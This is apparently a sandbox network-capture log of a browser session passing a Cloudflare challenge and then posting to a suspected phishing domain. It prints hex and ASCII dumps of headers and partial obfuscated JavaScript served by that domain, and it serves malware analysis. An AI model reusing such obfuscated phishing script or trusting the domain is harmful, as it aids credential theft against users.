                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:51 UTC16384OUTData Raw: 69 57 68 33 63 4f 2d 38 56 58 68 72 4d 54 43 2d 66 49 70 35 68 77 36 2d 4c 6e 49 67 2d 49 71 71 33 35 57 77 66 36 49 4b 33 72 57 4f 66 49 71 75 6b 49 77 73 45 57 49 44 54 49 48 6e 33 73 35 4d 77 6e 46 72 35 73 2d 6f 49 6b 4b 77 44 49 67 73 2d 43 65 68 73 73 2d 35 6d 33 35 68 49 54 35 54 72 57 43 49 69 33 2d 6d 6e 49 64 73 2d 75 6d 49 75 4b 43 49 72 33 72 75 43 30 49 2d 76 76 68 51 37 34 4b 2d 36 36 77 2d 54 33 45 42 49 38 4b 49 41 73 4a 50 71 4d 78 72 67 75 32 75 70 49 72 32 48 49 54 75 49 50 50 33 49 5a 67 2d 4e 72 73 2d 51 54 33 2d 37 68 52 6b 73 49 42 50 70 47 45 6d 62 41 73 49 52 5a 4a 67 52 35 37 68 59 49 49 43 39 6b 49 49 6e 42 79 4b 49 73 73 2d 76 4d 33 49 34 49 42 55 50 49 42 61 49 4e 4b 49 74 75 67 50 6c 51 4b 2d 65 41 56 49 65 69 73 49 4f 49 49
                                                                                        Data Ascii: iWh3cO-8VXhrMTC-fIp5hw6-LnIg-Iqq35Wwf6IK3rWOfIqukIwsEWIDTIHn3s5MwnFr5s-oIkKwDIgs-Cehss-5m35hIT5TrWCIi3-mnIds-umIuKCIr3ruC0I-vvhQ74K-66w-T3EBI8KIAsJPqMxrgu2upIr2HITuIPP3IZg-Nrs-QT3-7hRksIBPpGEmbAsIRZJgR57hYIIC9kIInByKIss-vM3I4IBUPIBaINKItugPlQK-eAVIeisIOII
                                                                                        2025-03-20 17:47:51 UTC16384OUTData Raw: 72 42 54 69 77 31 4d 72 67 31 44 72 5a 62 4b 4c 30 31 31 4e 51 2d 38 55 33 2b 67 39 4c 57 69 78 79 4c 4a 71 54 4b 4b 2d 68 5a 46 2b 2d 49 2b 4d 41 77 49 77 41 54 30 67 71 71 2d 32 33 30 4a 61 46 33 24 77 64 4a 63 71 2d 49 72 68 31 46 6a 55 67 24 73 6f 4c 33 4f 47 50 49 46 33 4b 77 30 54 52 38 77 6c 67 31 73 52 38 4c 66 68 61 65 4e 54 37 49 4f 79 49 6a 49 75 4b 77 51 4b 52 38 54 4b 77 47 54 30 4c 63 4b 77 6c 4b 49 33 64 30 37 79 49 31 4c 77 7a 68 37 44 2d 70 77 7a 68 35 79 4d 64 62 2d 67 66 79 58 71 32 57 4f 4c 2b 4f 6a 4c 4b 33 75 56 6d 73 75 36 55 6e 65 42 61 2b 57 33 65 55 38 68 2d 61 4f 64 4b 5a 30 33 59 56 75 56 58 73 6e 50 33 72 73 4c 45 77 2b 4a 42 33 69 24 77 79 49 39 33 4d 51 77 2b 49 62 54 78 4d 72 5a 33 64 4b 72 4d 4c 54 2d 58 33 4d 2d 49 44 33
                                                                                        Data Ascii: rBTiw1Mrg1DrZbKL011NQ-8U3+g9LWixyLJqTKK-hZF+-I+MAwIwAT0gqq-230JaF3$wdJcq-Irh1FjUg$soL3OGPIF3Kw0TR8wlg1sR8LfhaeNT7IOyIjIuKwQKR8TKwGT0LcKwlKI3d07yI1Lwzh7D-pwzh5yMdb-gfyXq2WOL+OjLK3uVmsu6UneBa+W3eU8h-aOdKZ03YVuVXsnP3rsLEw+JB3i$wyI93MQw+IbTxMrZ3dKrMLT-X3M-ID3
                                                                                        2025-03-20 17:47:51 UTC8310OUTData Raw: 33 75 72 49 4b 2d 69 4e 4a 41 45 38 2b 4d 49 6c 43 4f 64 51 76 30 51 7a 45 2b 46 6d 35 33 66 66 2d 46 24 58 45 48 6e 68 71 24 58 48 39 36 38 34 6b 66 61 44 5a 56 2d 59 59 4b 4d 2d 39 6d 4b 38 34 6e 36 65 55 38 49 51 68 4f 56 49 5a 72 4c 59 64 73 71 47 78 56 4c 64 59 46 74 38 63 6b 4e 6a 70 71 6c 2b 73 4f 79 2b 64 36 61 38 6c 54 2d 46 24 37 30 34 65 38 65 6f 61 70 48 42 36 58 5a 7a 6f 36 37 74 36 4e 5a 56 43 6b 71 35 54 45 70 48 5a 34 68 54 24 7a 34 6a 5a 71 57 68 24 58 33 2d 32 5a 4a 73 72 32 36 73 72 6a 77 79 6d 71 7a 57 46 44 36 33 6b 77 5a 24 36 6e 69 36 5a 4a 43 6f 57 51 4d 56 50 44 4d 36 7a 74 5a 5a 24 6f 39 69 45 50 4a 39 6f 59 66 4d 51 69 72 52 64 79 34 41 5a 66 73 54 59 36 77 36 7a 55 34 59 74 6d 50 33 57 66 57 6d 33 48 61 6e 48 77 36 4a 72 39 38
                                                                                        Data Ascii: 3urIK-iNJAE8+MIlCOdQv0QzE+Fm53ff-F$XEHnhq$XH9684kfaDZV-YYKM-9mK84n6eU8IQhOVIZrLYdsqGxVLdYFt8ckNjpql+sOy+d6a8lT-F$704e8eoapHB6XZzo67t6NZVCkq5TEpHZ4hT$z4jZqWh$X3-2ZJsr26srjwymqzWFD63kwZ$6ni6ZJCoWQMVPDM6ztZZ$o9iEPJ9oYfMQirRdy4AZfsTY6w6zU4YtmP3WfWm3HanHw6Jr98
                                                                                        2025-03-20 17:47:51 UTC282INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:47:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 5004
                                                                                        Connection: close
                                                                                        cf-chl-out: dYs34G1buMeFthK7uib5q4fbtZstulPKtJg/GrhZTdZxvih17mOhIAmgadyauTmOHnmI4oMkOeZPfkvvKjWI/x3YFuk3LrPp2ROMp1z5HaY=$6MEhlWu79aV5VjP/rRoSwg==
                                                                                        2025-03-20 17:47:51 UTC1235INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 6d 76 54 38 59 41 4b 2b 55 32 68 70 42 4a 39 49 35 32 65 38 66 48 34 4b 37 6e 7a 42 79 6b 74 31 4a 38 56 50 75 52 2b 6e 50 78 5a 55 4c 42 57 4b 58 4f 72 69 76 75 7a 2f 59 30 6a 35 63 76 6b 66 4f 6b 44 49 4f 66 61 6b 49 7a 6b 5a 6e 7a 51 6f 63 30 4f 39 52 66 2b 4d 45 70 31 2b 76 46 41 76 30 62 43 46 35 43 2f 52 38 74 6e 4d 5a 30 51 31 37 38 34 34 42 79 6e 46 34 53 30 6b 69 4a 6a 64 6e 63 75 51 41 66 70 4f 38 57 76 61 39 64 45 62 72 43 4f 42 35 2b 7a 45 53 33 45 33 37 30 4f 51 78 34 70 2b 73 68 4b 6e 43 77 70 33 68 75 4f 54 72 51 62 46 75 56 66 6f 6d 50 4f 38 79 53 6a 55 45 6c 72 65 44 75 56 33 74 4a 51 66 67 30 49 51 52 42 58 66 6e 4a 73 48 54 75 31 37 64 4f 53 49 49 7a 36 37 39 51 6e 64 52 43 30 31 2b 46 36 6c 5a
                                                                                        Data Ascii: cf-chl-out-s: mvT8YAK+U2hpBJ9I52e8fH4K7nzBykt1J8VPuR+nPxZULBWKXOrivuz/Y0j5cvkfOkDIOfakIzkZnzQoc0O9Rf+MEp1+vFAv0bCF5C/R8tnMZ0Q17844BynF4S0kiJjdncuQAfpO8Wva9dEbrCOB5+zES3E370OQx4p+shKnCwp3huOTrQbFuVfomPO8ySjUElreDuV3tJQfg0IQRBXfnJsHTu17dOSIIz679QndRC01+F6lZ
                                                                                        2025-03-20 17:47:51 UTC1221INData Raw: 57 47 4a 4b 55 56 39 37 6c 49 6d 4e 65 4a 53 4c 6b 33 42 38 57 6f 75 41 66 4a 78 7a 62 58 69 54 66 4a 78 78 68 34 42 6c 5a 59 71 42 72 6d 75 77 67 4b 4f 51 72 70 4f 70 67 58 6d 73 69 4a 53 72 6a 5a 79 59 72 35 50 44 6d 61 47 58 6b 59 66 43 70 37 79 49 6a 62 2f 50 7a 73 57 67 30 74 4b 39 71 49 36 34 77 72 66 4d 6e 4a 33 52 75 64 2b 77 73 2b 53 78 73 63 2b 66 79 62 58 58 7a 4c 7a 6d 76 37 6e 65 32 63 50 51 31 63 4c 6a 32 4e 54 33 79 38 58 79 2f 4d 37 49 39 39 2f 61 2b 4c 33 65 32 74 44 2b 41 2b 51 4d 37 50 33 63 41 4f 67 4b 35 4d 76 31 34 41 54 34 34 42 66 72 35 75 51 58 39 67 38 58 49 50 62 73 33 78 44 30 4a 52 62 33 43 43 63 43 2b 51 4c 34 47 77 77 55 4d 43 30 47 4f 50 63 71 39 42 59 51 2b 68 67 71 2f 69 49 67 2b 55 4d 6d 46 44 51 70 4a 68 59 6b 4b 45 73
                                                                                        Data Ascii: WGJKUV97lImNeJSLk3B8WouAfJxzbXiTfJxxh4BlZYqBrmuwgKOQrpOpgXmsiJSrjZyYr5PDmaGXkYfCp7yIjb/PzsWg0tK9qI64wrfMnJ3Rud+ws+Sxsc+fybXXzLzmv7ne2cPQ1cLj2NT3y8Xy/M7I99/a+L3e2tD+A+QM7P3cAOgK5Mv14AT44Bfr5uQX9g8XIPbs3xD0JRb3CCcC+QL4GwwUMC0GOPcq9BYQ+hgq/iIg+UMmFDQpJhYkKEs
                                                                                        2025-03-20 17:47:51 UTC1369INData Raw: 66 34 58 47 69 62 34 42 2b 49 67 47 50 67 46 36 67 2f 39 41 43 4d 4d 45 44 49 6e 43 52 55 37 42 78 55 4b 44 52 49 62 45 67 77 2b 46 69 4d 49 46 52 77 58 4f 6a 77 68 47 67 77 6c 4b 46 51 2b 45 53 59 79 4f 45 63 73 46 42 4e 52 52 31 41 62 55 54 77 2f 4f 46 63 31 57 6c 73 31 50 32 73 6b 50 6b 4e 6a 51 47 64 47 54 57 34 75 54 31 4a 69 4f 46 4a 46 61 6a 70 56 57 56 55 37 56 55 35 2b 51 56 6c 56 68 6e 4e 6b 56 6c 56 48 59 34 43 4b 65 33 75 54 55 47 46 6f 69 56 69 53 64 59 31 70 6c 33 6d 54 63 4a 61 4c 6b 31 78 30 65 6e 53 42 64 48 6d 46 67 58 57 41 6a 57 65 6a 6a 4c 4f 79 73 4a 2b 43 72 72 69 69 72 33 53 46 6b 4b 2b 59 65 70 7a 45 66 34 57 57 78 34 53 68 6f 36 65 36 66 37 65 72 79 34 71 68 78 63 65 50 72 63 65 6b 6c 72 61 35 6e 4c 43 73 7a 70 6a 5a 76 4c 33 6a
                                                                                        Data Ascii: f4XGib4B+IgGPgF6g/9ACMMEDInCRU7BxUKDRIbEgw+FiMIFRwXOjwhGgwlKFQ+ESYyOEcsFBNRR1AbUTw/OFc1Wls1P2skPkNjQGdGTW4uT1JiOFJFajpVWVU7VU5+QVlVhnNkVlVHY4CKe3uTUGFoiViSdY1pl3mTcJaLk1x0enSBdHmFgXWAjWejjLOysJ+Crriir3SFkK+YepzEf4WWx4Sho6e6f7ery4qhxcePrceklra5nLCszpjZvL3j
                                                                                        2025-03-20 17:47:51 UTC1369INData Raw: 6e 34 2f 68 6a 35 4d 53 6b 4f 41 44 55 74 45 66 49 35 4d 52 55 55 50 54 55 5a 45 6a 6f 4e 47 43 30 6b 48 78 45 2b 4b 42 64 4c 4a 45 55 35 44 6a 45 76 43 56 49 31 4a 6b 4d 34 4e 53 55 7a 4e 31 6f 58 4e 78 6b 74 50 7a 74 5a 59 79 42 42 50 46 6c 47 56 53 70 4e 53 79 56 75 55 55 4a 66 56 46 41 75 54 55 52 45 59 55 68 76 4f 46 74 58 64 58 38 38 58 56 68 31 59 6e 46 47 63 32 64 42 6a 48 6c 62 69 30 39 6f 62 32 78 79 54 57 39 6e 59 35 4b 4e 64 58 6c 55 6d 58 46 61 6d 36 42 59 65 70 46 30 67 36 4a 38 59 36 6d 6b 59 6f 6c 37 6f 61 4e 78 70 4b 4f 4d 71 49 2b 70 70 37 69 6a 71 32 36 51 71 4b 7a 42 65 38 47 32 72 61 43 62 68 72 52 37 67 72 53 56 77 37 69 2f 75 39 4b 4b 6b 36 44 56 72 61 4c 46 70 37 66 57 73 4a 66 65 73 70 36 2b 74 37 7a 55 77 38 43 32 6f 62 53 36 74
                                                                                        Data Ascii: n4/hj5MSkOADUtEfI5MRUUPTUZEjoNGC0kHxE+KBdLJEU5DjEvCVI1JkM4NSUzN1oXNxktPztZYyBBPFlGVSpNSyVuUUJfVFAuTUREYUhvOFtXdX88XVh1YnFGc2dBjHlbi09ob2xyTW9nY5KNdXlUmXFam6BYepF0g6J8Y6mkYol7oaNxpKOMqI+pp7ijq26QqKzBe8G2raCbhrR7grSVw7i/u9KKk6DVraLFp7fWsJfesp6+t7zUw8C2obS6t
                                                                                        2025-03-20 17:47:51 UTC1045INData Raw: 51 2f 43 38 50 37 51 6a 32 46 79 6f 37 45 77 35 41 39 30 41 63 48 7a 34 74 49 42 4d 33 49 69 51 39 52 30 77 6c 52 42 78 4e 4c 30 56 4f 52 69 63 52 51 6b 34 76 46 53 68 61 4c 78 68 66 51 44 55 74 58 31 34 31 4d 31 63 7a 50 6b 68 4e 50 46 6b 6e 57 30 39 41 63 30 42 67 52 43 35 6e 53 46 64 48 65 7a 5a 50 53 58 5a 2b 61 32 42 64 55 6c 64 53 51 46 74 6c 5a 45 68 64 61 55 5a 70 61 47 4a 68 6b 6f 6c 78 6d 46 4f 4c 64 34 74 62 69 48 6d 55 69 70 5a 32 63 6d 79 6a 67 49 43 6a 65 70 4e 6b 71 34 36 4a 6f 32 2b 6a 67 47 71 6d 70 6f 57 70 67 62 57 58 69 4b 5a 39 6b 33 69 2b 72 4b 76 44 66 34 47 61 6f 35 58 46 6e 4a 65 70 71 36 37 42 7a 36 71 79 77 37 57 4f 71 71 4f 35 6f 61 75 35 6b 39 43 37 71 38 37 52 74 39 4f 31 31 63 2f 63 73 4e 2b 2f 33 65 61 73 32 65 48 6a 36 63
                                                                                        Data Ascii: Q/C8P7Qj2Fyo7Ew5A90AcHz4tIBM3IiQ9R0wlRBxNL0VORicRQk4vFShaLxhfQDUtX141M1czPkhNPFknW09Ac0BgRC5nSFdHezZPSXZ+a2BdUldSQFtlZEhdaUZpaGJhkolxmFOLd4tbiHmUipZ2cmyjgICjepNkq46Jo2+jgGqmpoWpgbWXiKZ9k3i+rKvDf4Gao5XFnJepq67Bz6qyw7WOqqO5oau5k9C7q87Rt9O11c/csN+/3eas2eHj6c


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.1649756104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:51 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:52 UTC442INHTTP/1.1 400 Bad Request
                                                                                        Date: Thu, 20 Mar 2025 17:47:52 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: 38OxHVsbkbrgq2B52azhLkNabu1qrqn8FVTW5+Lx7ApIIC0+w0vEe1wdhZ0SRDJoEAQEvvxFmZ+mYr2sy1itAA==$EDpi4JiIeS0cNgZ/3VaflQ==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923709821df79e08-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:47:52 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                                        Data Ascii: {"err":100280}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.1649757172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:51 UTC1055OUTPOST /NC6tS/ HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 1008
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: __cf_mw_byp=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-/NC6tS/; PHPSESSID=u515kjbcksf5dviiqoem8t30ja
                                                                                        2025-03-20 17:47:51 UTC1008OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 2d 6e 62 6e 50 7a 62 4d 70 36 58 46 54 38 76 35 73 53 70 6c 47 48 6c 47 30 35 72 47 39 62 76 34 7a 44 47 6d 4c 47 62 7a 62 31 52 2d 47 35 34 38 6e 36 68 32 36 47 6d 43 36 49 2d 32 32 45 43 4b 70 54 67 6b 6c 61 4f 73 4b 62 37 59 78 62 53 72 46 72 32 35 32 68 74 36 4c 45 57 39 70 62 36 2d 73 46 6a 68 63 58 4c 62 38 38 55 47 72 78 45 78 76 59 32 59 4a 37 50 68 4e 74 66 49 36 69 45 4e 4a 54 6a 43 50 4f 62 79 75 78 50 37 70 4c 64 58 67 52 36 31 58 6b 54 52 74 6f 47 64 6d 33 4d 70 63 65 66 41 50 57 30 44 48 67 73 46 5a 76 2d 69 51 62 66 69 57 58 49 7a 67 59 79 7a 45 36 59 5a 46 61 53 76 4f 62 76 72 36 63 43 34 71 63 4e 63 6a 64 68 49 68 47 64 70 48 6d 47 6c 2d 48 78 76 67 76 48 68 78 65 5f
                                                                                        Data Ascii: cf-turnstile-response=0.-nbnPzbMp6XFT8v5sSplGHlG05rG9bv4zDGmLGbzb1R-G548n6h26GmC6I-22ECKpTgklaOsKb7YxbSrFr252ht6LEW9pb6-sFjhcXLb88UGrxExvY2YJ7PhNtfI6iENJTjCPObyuxP7pLdXgR61XkTRtoGdm3MpcefAPW0DHgsFZv-iQbfiWXIzgYyzE6YZFaSvObvr6cC4qcNcjdhIhGdpHmGl-HxvgvHhxe_
                                                                                        2025-03-20 17:47:52 UTC385INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:47:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Cf-Cache-Status: DYNAMIC
                                                                                        CF-RAY: 9237098149d6cef2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:47:52 UTC984INData Raw: 39 64 62 0d 0a 3c 21 2d 2d 20 3c 73 70 61 6e 3e 44 75 69 73 20 76 65 6c 69 74 20 65 61 20 64 65 73 65 72 75 6e 74 20 70 6f 72 6b 2c 20 6f 66 66 69 63 69 61 20 73 65 64 20 63 61 70 69 63 6f 6c 61 20 62 61 63 6f 6e 20 66 69 6c 65 74 20 6d 69 67 6e 6f 6e 20 74 2d 62 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 72 68 31 33 7a 38 6a 65 6d 74 20 3d 20 27 27 3b 2f 2f 20 43 68 69 63 6b 65 6e 20 74 65 6d 70 6f 72 20 66 61 74 62 61 63 6b 20 6d 69 6e 69 6d 2c 20 65 73 74 20 6d 6f 6c 6c 69 74 20 70 61 72 69 61 74 75 72 20 63 6f 6e 73 65 63 74 65 74 75 72 20 72 75 6d 70 20 65 69 75 73 6d 6f 64 20 62 6f 75 64 69 6e 20 68 61 6d 20 68 6f 63 6b 20 61 6c 69 71 75 61 20 63 6f 77 20 62 75 66 66 61 6c 6f 2e 0a 66 75 6e 63 74 69 6f 6e
                                                                                        Data Ascii: 9db... <span>Duis velit ea deserunt pork, officia sed capicola bacon filet mignon t-bone.</span> --><script>let rh13z8jemt = '';// Chicken tempor fatback minim, est mollit pariatur consectetur rump eiusmod boudin ham hock aliqua cow buffalo.function
                                                                                        2025-03-20 17:47:52 UTC1369INData Raw: 76 47 3b 79 47 74 59 73 76 47 3b 79 47 74 59 73 76 47 2d 2d 29 73 37 69 56 65 43 2e 75 6e 73 68 69 66 74 28 73 37 69 56 65 43 2e 70 6f 70 28 29 29 3b 72 65 74 75 72 6e 20 73 37 69 56 65 43 7d 2c 30 78 31 29 28 5b 27 5d 6b 5e 75 5a 35 2a 4e 27 2c 27 7b 2a 41 57 6d 4c 2b 46 27 2c 27 50 7b 59 6b 77 50 7e 27 2c 27 5f 54 2a 45 79 2e 3d 3b 28 39 27 2c 27 65 23 5b 58 27 2c 27 6f 44 6d 2a 27 2c 27 4c 52 7a 28 6b 41 71 3b 7a 27 2c 27 46 38 26 5d 32 7b 2b 46 26 27 2c 27 60 35 7d 54 22 6c 30 4c 27 2c 27 6b 2a 37 5d 7e 4d 76 26 2a 61 2b 29 4d 38 2b 27 2c 27 2c 4a 29 2e 38 6e 69 7d 58 2b 66 4b 7e 4d 49 28 57 71 60 7a 7e 59 47 7a 26 3e 7c 34 7d 64 65 71 56 61 2f 6b 34 57 75 5f 71 61 7a 5f 23 79 2e 43 27 2c 27 61 56 76 7b 7a 6e 23 78 46 36 62 48 75 3d 3b 6b 27 2c 27 7b
                                                                                        Data Ascii: vG;yGtYsvG;yGtYsvG--)s7iVeC.unshift(s7iVeC.pop());return s7iVeC},0x1)([']k^uZ5*N','{*AWmL+F','P{YkwP~','_T*Ey.=;(9','e#[X','oDm*','LRz(kAq;z','F8&]2{+F&','`5}T"l0L','k*7]~Mv&*a+)M8+',',J).8ni}X+fK~MI(Wq`z~YGz&>|4}deqVa/k4Wu_qaz_#y.C','aVv{zn#xF6bHu=;k','{
                                                                                        2025-03-20 17:47:52 UTC177INData Raw: 2f 6d 7a 44 2a 4b 23 38 3d 59 49 74 54 37 26 67 30 3d 6d 79 76 27 2c 27 34 22 71 33 28 4a 7e 27 2c 27 4f 45 24 49 2e 53 7e 27 2c 27 59 36 3f 33 5e 67 6b 67 74 2b 29 45 62 38 36 67 54 32 2b 57 6d 43 62 76 58 6f 68 67 33 52 76 60 66 32 63 33 6b 27 2c 27 79 22 4d 7b 37 55 6b 75 54 60 34 47 51 4d 5f 67 4b 61 22 2e 27 2c 27 33 22 3a 66 4c 36 51 26 4d 3e 2e 4b 6d 5e 25 72 3b 54 51 33 24 41 42 36 73 7b 63 4b 6d 68 6f 6c 27 2c 27 7d 22 47 51 77 68 4e 39 31 61 51 2a 7a 34 68 58 76 38 58 56 3e 36 44 79 4f 76 33 61 46 63 5b 5e 52 0d 0a
                                                                                        Data Ascii: /mzD*K#8=YItT7&g0=myv','4"q3(J~','OE$I.S~','Y6?3^gkgt+)Eb86gT2+WmCbvXohg3Rv`f2c3k','y"M{7UkuT`4GQM_gKa".','3":fL6Q&M>.Km^%r;TQ3$AB6s{cKmhol','}"GQwhN91aQ*z4hXv8XV>6DyOv3aFc[^R
                                                                                        2025-03-20 17:47:52 UTC1369INData Raw: 35 38 34 0d 0a 76 45 7a 47 5f 4e 4e 47 2a 27 2c 27 2c 76 5e 6b 47 55 41 23 7b 4e 24 2f 74 2f 58 39 44 54 52 26 2c 58 7e 27 2c 27 39 61 6e 26 65 6e 62 35 5d 61 48 2e 48 27 2c 27 4a 44 52 49 66 45 77 75 78 36 34 77 71 44 3e 27 2c 27 3f 45 46 66 5b 63 73 4e 48 47 57 57 34 52 51 49 55 63 3d 7c 69 4d 72 75 77 76 77 68 58 34 59 6c 5f 7e 27 2c 27 61 71 46 56 61 6f 57 6b 7a 4f 25 37 46 52 3e 60 4c 56 49 6c 26 6e 29 39 7e 36 4e 27 2c 27 5e 32 7b 49 23 6d 7e 59 36 61 5e 39 2e 4c 7d 27 2c 27 71 22 3b 4a 5b 52 2b 23 41 3b 29 58 46 4c 38 5e 52 32 7e 2e 57 53 5f 48 72 4e 65 24 5b 69 4d 3d 2b 38 7c 66 67 4f 68 4e 51 27 2c 27 7a 56 7c 51 5d 7a 28 4e 5e 55 55 78 62 46 65 32 55 4a 41 7a 21 23 32 6c 3f 55 6a 75 7c 70 26 49 64 4a 70 26 44 55 7e 27 2c 27 6a 4f 5d 22 60 41 40
                                                                                        Data Ascii: 584vEzG_NNG*',',v^kGUA#{N$/t/X9DTR&,X~','9an&enb5]aH.H','JDRIfEwux64wqD>','?EFf[csNHGWW4RQIUc=|iMruwvwhX4Yl_~','aqFVaoWkzO%7FR>`LVIl&n)9~6N','^2{I#m~Y6a^9.L}','q";J[R+#A;)XFL8^R2~.WS_HrNe$[iM=+8|fgOhNQ','zV|Q]z(N^UUxbFe2UJAz!#2l?Uju|p&IdJp&DU~','jO]"`A@
                                                                                        2025-03-20 17:47:52 UTC50INData Raw: 48 30 59 42 65 2b 6a 4e 3b 77 44 43 43 63 4d 7b 3a 5f 4e 73 42 26 4a 61 24 4b 35 52 60 71 34 61 6f 49 46 4c 45 2e 7d 33 27 2c 27 23 55 45 3d 3e 0d 0a
                                                                                        Data Ascii: H0YBe+jN;wDCCcM{:_NsB&Ja$K5R`q4aoIFLE.}3','#UE=>
                                                                                        2025-03-20 17:47:53 UTC1369INData Raw: 62 30 38 0d 0a 53 46 28 32 4e 7b 4a 2f 79 50 71 37 34 2a 4d 45 7a 23 32 46 38 7b 78 79 69 44 6c 6b 61 50 5d 6b 32 34 42 44 27 2c 27 6c 61 48 7b 70 7a 68 32 47 2a 36 69 4a 39 31 54 28 45 5a 2e 33 36 7c 48 2c 2b 5b 55 69 38 32 78 7c 61 70 69 27 2c 27 45 49 2a 7b 76 36 47 78 7e 6f 41 21 5e 2f 3b 78 2f 5b 79 7b 39 27 2c 27 67 68 3e 50 3d 32 2e 6c 5d 37 47 37 71 22 22 43 6c 63 29 30 7a 68 3f 39 68 38 2a 7b 33 4c 71 54 2f 70 5d 6b 2a 55 37 23 31 60 53 21 60 38 48 76 27 2c 27 40 6f 44 7a 32 42 23 32 57 37 3d 6e 30 34 6e 49 51 34 79 56 77 6e 4c 6b 2e 50 22 71 35 4d 6a 24 27 2c 27 3b 56 30 5d 34 21 39 3b 7a 37 38 6c 35 68 72 79 50 61 78 57 25 74 73 39 67 2b 5f 74 51 68 4b 3d 5b 22 4f 66 77 6e 6c 59 66 78 28 27 2c 27 72 7a 28 7c 58 32 37 7d 51 33 78 6e 4e 52 2e 43
                                                                                        Data Ascii: b08SF(2N{J/yPq74*MEz#2F8{xyiDlkaP]k24BD','laH{pzh2G*6iJ91T(EZ.36|H,+[Ui82x|api','EI*{v6Gx~oA!^/;x/[y{9','gh>P=2.l]7G7q""Clc)0zh?9h8*{3LqT/p]k*U7#1`S!`8Hv','@oDz2B#2W7=n04nIQ4yVwnLk.P"q5Mj$',';V0]4!9;z78l5hryPaxW%ts9g+_tQhK=["OfwnlYfx(','rz(|X27}Q3xnNR.C
